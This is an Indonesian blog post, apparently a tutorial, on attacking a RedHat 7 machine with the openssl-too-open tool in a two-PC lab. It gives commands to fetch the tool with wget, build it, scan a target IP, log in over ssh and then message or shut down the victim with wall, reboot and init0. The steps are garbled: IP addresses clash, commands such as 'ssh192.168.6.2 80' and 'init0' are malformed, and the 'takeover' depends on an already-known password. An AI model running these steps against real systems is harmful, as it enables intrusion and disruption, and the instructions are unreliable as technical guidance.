Kita tahu bahwa system operasi Redhat7 memiliki banyak sekali bug. Tetapi bug ini telah dapat diatasi pada varian RedHat 7 sesudahnya.
Kita dapat melakukan exploid pada RedHat7 dengan hanya menggunakan 2 tools saja. Tetapi tentu saja dengan syarat dan ketentuan yang berlaku.
Yang perlu disiapkan adalah 2 buah PC yang sudah diinstall Redhat7, serta PC tujuan yang akan diserang menggunakan teknik SSH harus diinstal webserver (ex Apache / Wampserver).
Apache / Wampserver digunakan PC penyerang untuk mendownload file openssl-too-open.tar.gz dari PC korban.
Untuk dapat mengambil alih computer korban yang menggunakan system operasi RedHat 7, kita dapat menggunakan cara dibawah ini :
1. jalankan linux kita.
Pastikan eth0 pada komputer 1 memiliki IP 192.168.207.10
Pastikan eth0 pada komputer 2 memiliki IP 192.168.207.15
2. Cek apakah target kita menggunakan system operasi RedHat 7? Bila ya, kita dapat melanjutkan proses dibawah ini.
3. Pertama kita harus mempunyai sebuah tools bernama openssl-too-open.
4. Bila kita tidak mempunyai tools ini, kita dapat mendownloadnya pada computer download (192.168.207.15) dengan cara ketikkan :
5. # wget http://192.168.207.15/openssl-too-open.tar.gz
6. Perlu diperhatikan bahwa harus terdapat web server pada computer download. File openssl-too-open.tar.gz harus berada pada folder htdoc atau /www/html pada folder web server itu sendiri.
7. Extraklah file tersebut dengan cara mengetikkan :
# tar –zxvf openssl-too-open.tar.gz
8. Setelah di extract masuk ke direktori Openssl-too-open.
Silakan menginstal pada directory yang Anda inginkan, setelah itu silakan diinstal dengan mengetikkan :
# make
9. Sekarang, kita akan menscann computer target (192.168.6.2) mengetikkan :
# ./openssl-scanner –d 192.168.6.2
10. Kita akan coba memasuki computer target dengan memasuki port yang ada kemungkinan terbuka. Kita coba port 80 (WEB) dengan menggunakan SSHt dengan mengetikkan :
# ssh192.168.6.2 80
akan ada konfirmasi password komputer korban, kita masukkan password yang telah kita ketahui.
11. Kita bisa melakukan wall ke komputer korban
ketikkan:
wall sing penting conect
Maka pesan yg dikirim komputer 1 tampak di komputer 2
kita juga bisa mematikan komputer korban dengan cara:
reboot (melakukan restart)
init0 (mematikan komputer)
Selamat mencoba ^^
Tidak ada komentar:
Posting Komentar